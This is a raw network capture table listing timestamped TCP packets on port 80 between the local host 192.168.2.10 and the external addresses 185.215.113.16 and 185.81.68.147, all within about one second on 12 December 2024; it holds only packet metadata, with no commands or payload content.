                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.330389023 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.332214117 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.332277060 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.332425117 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.336652994 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.336733103 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.336774111 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.336802006 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.341273069 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.341296911 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.341411114 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.345884085 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.346051931 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.346075058 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.346194029 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.350234985 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.350974083 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.351344109 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.351392031 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.354492903 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.355125904 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.355129957 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.355253935 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.358573914 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.358679056 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.359201908 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.362509012 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.362799883 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.363162041 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.363276005 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.366569996 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.366627932 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.366671085 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.366671085 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.370232105 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.370387077 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.370404005 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.370446920 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.373908043 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.373997927 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.375935078 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.376317024 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.377702951 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.377954960 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.378627062 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.378813028 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.379681110 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.380136967 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.380142927 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.380244017 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.380270004 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.380465984 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.381264925 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.381375074 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.381380081 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.381479979 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.381654024 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.381874084 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.382083893 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.382179022 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.382186890 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.382280111 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.383147955 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.383912086 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.384094954 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.384176970 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.384399891 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.384689093 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.384982109 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.385176897 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.385184050 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.385219097 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.385323048 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.385433912 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.386200905 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.386332989 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.386445999 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.387281895 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.387636900 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.387732983 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.388305902 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.388715982 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.388721943 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.388729095 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.388813972 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.389252901 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.389313936 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.389420033 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.389513969 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.390326023 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.390618086 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.390733957 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.391304970 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.391942024 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.392131090 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.392260075 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.392426014 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.392432928 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.392509937 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.392509937 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.392529011 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.392576933 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.393362999 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.393688917 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.393830061 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.394503117 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.394509077 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.394758940 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.395582914 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.395804882 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.395925045 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.396433115 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.396615982 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.396653891 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.396658897 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.396760941 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.396797895 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.397557974 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.397659063 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.397737026 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.398483992 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.398617029 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.398693085 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.399422884 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.399854898 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.399859905 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.399888039 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.399980068 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.400432110 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.400618076 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.401495934 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.401500940 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.401506901 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.401599884 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.402426958 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.403410912 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.403512001 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.403537989 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.403543949 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.403593063 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.403599024 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.403601885 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.403641939 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.404454947 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.404558897 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.404781103 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.405476093 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.405776024 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.405854940 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.406558037 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.406563997 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.406658888 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.407279015 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.407334089 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.407501936 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.407516956 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.407603979 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.407613039 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.407700062 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.408560991 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.408567905 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.408694029 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.409517050 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.410106897 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.410303116 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.411019087 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.411025047 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.411035061 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.411048889 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.411139011 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.411567926 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.411653042 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.411706924 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.411740065 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.412587881 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.412839890 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.412990093 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.413595915 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.414504051 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.414587975 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.414621115 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.414628029 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.414709091 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.414715052 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.414719105 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.414931059 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.415632010 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.415769100 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.415848017 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.416636944 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.417665958 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.417673111 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.417697906 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.417809963 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.418406010 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.418682098 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.418687105 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.418688059 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.418694973 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.418812037 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.419739008 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.419835091 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.419881105 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.419955969 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.420753002 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.420758963 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.420881033 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.421706915 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.421916008 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.422022104 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.422117949 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.422576904 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.422754049 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.422760010 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.422806025 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.422858000 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.422897100 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.423749924 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.423947096 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.424048901 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.424745083 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.425858974 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.425863981 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.425875902 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.425880909 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.425887108 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.425971031 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.426017046 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.426017046 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.426809072 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.427190065 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.427278996 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.427999020 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.428344965 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.428838015 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.428917885 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.429414988 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.429544926 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.429757118 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.429832935 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.429857969 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.430078030 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.430912018 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.430917025 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.430979967 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.431025982 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.431866884 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.431926966 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.432034969 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.432907104 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.433317900 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.434329033 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.434782028 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.437182903 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.437225103 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.437412024 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.437470913 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.478481054 CET4994680192.168.2.10185.81.68.147
